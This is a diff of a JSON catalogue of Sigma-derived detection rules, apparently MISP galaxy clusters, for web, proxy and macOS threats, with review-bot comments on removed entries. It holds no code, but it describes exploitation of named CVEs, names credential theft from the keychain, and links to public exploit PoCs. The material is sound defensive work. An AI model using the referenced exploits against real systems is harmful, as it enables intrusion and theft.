- "https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/",
- "https://github.com/hieuminhnv/CVE-2022-21587-POC",
- "https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis",
- "https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_21587_oracle_ebs.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.21587"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d033cb8a-8669-4a8e-a974-48d4185a8503",
- "value": "Potential CVE-2022-21587 Exploitation Attempt"
- },
- {
- "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.",
- "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/09/24",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "filename": "web_cve_2021_22005_vmware_file_upload.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server",
- "https://kb.vmware.com/s/article/85717",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_22005_vmware_file_upload.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec",
- "value": "VMware vCenter Server File Upload CVE-2021-22005"
- },
- {
- "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n",
- "meta": {
- "author": "daffainfo, Florian Roth",
- "creation_date": "2021/10/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_41773_apache_path_traversal.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
- "https://twitter.com/bl4sty/status/1445462677824761878",
- "https://twitter.com/ptswarm/status/1445376079548624899",
- "https://twitter.com/h4x0r_dz/status/1445401960371429381",
- "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_41773_apache_path_traversal.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5",
- "value": "CVE-2021-41773 Exploitation Attempt"
- },
- {
- "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/07/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2014_6287_hfs_rce.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/",
- "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md",
- "https://www.exploit-db.com/exploits/39161",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.t1505.003",
- "cve.2014.6287"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae",
- "value": "Rejetto HTTP File Server RCE"
- },
{
"description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"",
"meta": {
@@ -86599,9 +81651,9 @@
"logsource.category": "webserver",
"logsource.product": "No established product",
"refs": [
- "https://www.exploit-db.com/exploits/19525",
"https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml",
"https://github.com/lijiejie/IIS_shortname_Scanner",
+ "https://www.exploit-db.com/exploits/19525",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml"
],
"tags": [
@@ -86621,128 +81673,6 @@
"uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac",
"value": "Successful IIS Shortname Fuzzing Scan"
},
- {
- "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/08/12",
- "falsepositive": [
- "Vulnerability scanners"
- ],
- "filename": "web_cve_2022_31656_auth_bypass.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2022_31656_auth_bypass.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80",
- "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass"
- },
- {
- "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_3452_cisco_asa_ftd.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://twitter.com/aboul3la/status/1286012324722155525",
- "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.3452"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29",
- "value": "Cisco ASA FTD Exploit CVE-2020-3452"
- },
- {
- "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539",
- "meta": {
- "author": "Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems)",
- "creation_date": "2021/09/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_40539_adselfservice.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_40539_adselfservice.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11",
- "value": "ADSelfService Exploitation"
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/02/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_0688_msexchange.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_0688_msexchange.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5",
- "value": "CVE-2020-0688 Exchange Exploitation via Web Log"
- },
{
"description": "Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication",
"meta": {
@@ -86777,76 +81707,6 @@
"uuid": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e",
"value": "Suspicious Windows Strings In URI"
},
- {
- "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack",
- "meta": {
- "author": "Arnim Rupp, Florian Roth",
- "creation_date": "2020/01/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2019_19781_citrix_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://support.citrix.com/article/CTX267027",
- "https://support.citrix.com/article/CTX267679",
- "https://twitter.com/mpgn_x64/status/1216787131210829826",
- "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
- "https://isc.sans.edu/diary/25686",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2019_19781_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756",
- "value": "Citrix Netscaler Attack CVE-2019-19781"
- },
- {
- "description": "Detects CVE-2020-0688 Exploitation attempts",
- "meta": {
- "author": "NVISO",
- "creation_date": "2020/02/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2020_0688_exchange_exploit.yml",
- "level": "high",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://github.com/Ridter/cve-2020-0688",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2020_0688_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a",
- "value": "CVE-2020-0688 Exploitation Attempt"
- },
{
"description": "Detects SSTI attempts sent via GET requests in access logs",
"meta": {
@@ -86870,71 +81730,6 @@
"uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342",
"value": "Server Side Template Injection Strings"
},
- {
- "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "web_cve_2021_26858_iis_rce.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_26858_iis_rce.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a",
- "value": "ProxyLogon Reset Virtual Directories Based On IIS Log"
- },
- {
- "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).",
- "meta": {
- "author": "Sittikorn S, Nuttakorn Tungpoonsup",
- "creation_date": "2021/09/10",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml",
- "level": "critical",
- "logsource.category": "webserver",
- "logsource.product": "No established product",
- "refs": [
- "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_cve_2021_40539_manageengine_adselfservice_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.persistence",
- "attack.t1505.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1",
- "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit"
- },
{
"description": "Detects suspicious user agent strings used in APT malware in proxy logs",
"meta": {
@@ -86969,19 +81764,20 @@
"value": "APT User Agent"
},
{
- "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string",
+ "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
+ "author": "Florian Roth (Nextron Systems), Brian Ingram (update)",
"creation_date": "2022/07/08",
"falsepositive": [
"Unknown"
],
"filename": "proxy_ua_susp_base64.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html",
+ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml"
],
"tags": [
@@ -86999,7 +81795,7 @@
}
],
"uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3",
- "value": "Suspicious Base64 User Agent"
+ "value": "Potential Base64 Encoded User-Agent"
},
{
"description": "Detects user agent and URI paths used by empire agents",
@@ -87048,8 +81844,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/jhencinski/status/1102695118455349248",
"https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/",
+ "https://twitter.com/jhencinski/status/1102695118455349248",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"
],
"tags": [
@@ -87161,8 +81957,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
"https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/",
+ "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw",
"https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml"
],
@@ -87373,9 +82169,9 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
+ "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
"https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
- "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml"
],
"tags": [
@@ -87466,14 +82262,14 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents",
"http://www.botopedia.org/search?searchword=scan&searchphrase=all",
- "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q",
- "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://networkraptor.blogspot.com/2015/01/user-agent-strings.html",
- "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large",
+ "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents",
"https://twitter.com/crep1x/status/1635034100213112833",
+ "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large",
+ "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q",
"https://perishablepress.com/blacklist/ua-2013.txt",
+ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml"
],
"tags": [
@@ -87506,9 +82302,9 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638",
"https://blog.talosintelligence.com/ipfs-abuse/",
"https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11",
+ "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml"
],
"tags": [
@@ -87584,8 +82380,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://rclone.org/",
"https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone",
+ "https://rclone.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml"
],
"tags": [
@@ -87639,29 +82435,6 @@
"uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797",
"value": "Potential OWASSRF Exploitation Attempt - Proxy"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proxy_malware_3cx_compromise_c2_beacon_activity.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_malware_3cx_compromise_c2_beacon_activity.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy"
- },
{
"description": "Detects suspicious user agent strings used by crypto miners in proxy logs",
"meta": {
@@ -87796,30 +82569,6 @@
"uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6",
"value": "iOS Implant URL Pattern"
},
- {
- "description": "Detects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/31",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proxy_malware_3cx_compromise_susp_ico_requests.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/",
- "https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_malware_3cx_compromise_susp_ico_requests.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "76bc1601-9546-4b75-9419-06e0e8d10651",
- "value": "Potential Compromised 3CXDesktopApp ICO C2 File Download"
- },
{
"description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike",
"meta": {
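Review bot: same concern as the preceding hunk: the `-` lines drop the 3CX ICO download cluster (uuid 76bc1601-9546-4b75-9419-06e0e8d10651) without a deprecation marker. Verify that proxy_malware_3cx_compromise_susp_ico_requests.yml is gone upstream and that no other cluster's `related` array still points at this uuid.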
@@ -87917,8 +82666,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.advanced-ip-scanner.com/",
"https://www.advanced-port-scanner.com/",
+ "https://www.advanced-ip-scanner.com/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_adv_ip_port_scanner_upd_check.yml"
],
"tags": [
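Review bot: this hunk, like most of the `refs`-only hunks that follow it, merely swaps the order of two URLs (advanced-ip-scanner.com and advanced-port-scanner.com) with no change in content, so the patch is dominated by reordering noise that buries the real additions and removals. If the generator does not already do so, sorting `refs` deterministically (or preserving the upstream order) before serialising would keep future updates reviewable; the trailing SigmaHQ link is consistently kept last in every list, so only the entries preceding it need a stable sort.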
@@ -87938,6 +82687,39 @@
"uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d",
"value": "Advanced IP/Port Scanner Update Check"
},
+ {
+ "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proxy_ua_base64_encoded.yml",
+ "level": "medium",
+ "logsource.category": "proxy",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1071.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d443095b-a221-4957-a2c4-cd1756c9b747",
+ "value": "Suspicious Base64 Encoded User-Agent"
+ },
{
"description": "Detects download of certain file types from hosts in suspicious TLDs",
"meta": {
@@ -87951,10 +82733,10 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap",
- "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
- "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/",
"https://www.spamhaus.org/statistics/tlds/",
+ "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/",
+ "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
+ "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml"
],
"tags": [
@@ -87991,29 +82773,6 @@
"uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19",
"value": "Download From Suspicious TLD - Blacklist"
},
- {
- "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/02/08",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proxy_apt_domestic_kitten.yml",
- "level": "high",
- "logsource.category": "proxy",
- "logsource.product": "No established product",
- "refs": [
- "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1",
- "value": "Domestic Kitten FurBall Malware Pattern"
- },
{
"description": "Detects Malleable Amazon Profile",
"meta": {
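Review bot: the `-` lines remove the Domestic Kitten FurBall cluster (uuid 6c939dfa-c710-4e12-a4dd-47e1f10e68e1), a threat-actor-specific detection, with no replacement entry. As with the 3CX removals above, confirm that proxy_apt_domestic_kitten.yml was deprecated or deleted upstream rather than lost to a path change in the generator, and check for dangling `dest-uuid` references to it.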
@@ -88236,8 +82995,8 @@
"logsource.category": "proxy",
"logsource.product": "No established product",
"refs": [
- "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb",
+ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml"
],
"tags": [
@@ -88567,8 +83326,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://objective-see.org/blog/blog_0x4B.html",
"https://redcanary.com/blog/applescript/",
+ "https://objective-see.org/blog/blog_0x4B.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml"
],
"tags": [
@@ -88651,8 +83410,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/osacompile.html",
"https://redcanary.com/blog/applescript/",
+ "https://ss64.com/osx/osacompile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml"
],
"tags": [
@@ -88685,9 +83444,9 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/sysadminctl.html",
- "https://ss64.com/osx/dscl.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos",
+ "https://ss64.com/osx/dscl.html",
+ "https://ss64.com/osx/sysadminctl.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_add_to_admin_group.yml"
],
"tags": [
@@ -89217,8 +83976,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://ss64.com/osx/sysadminctl.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://ss64.com/osx/sysadminctl.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml"
],
"tags": [
@@ -89474,9 +84233,9 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
+ "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
"https://www.manpagez.com/man/8/firmwarepasswd/",
"https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web",
- "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml"
],
"tags": [
@@ -90034,8 +84793,8 @@
"logsource.category": "process_creation",
"logsource.product": "macos",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
"https://gist.github.com/Capybara/6228955",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml"
],
"tags": [
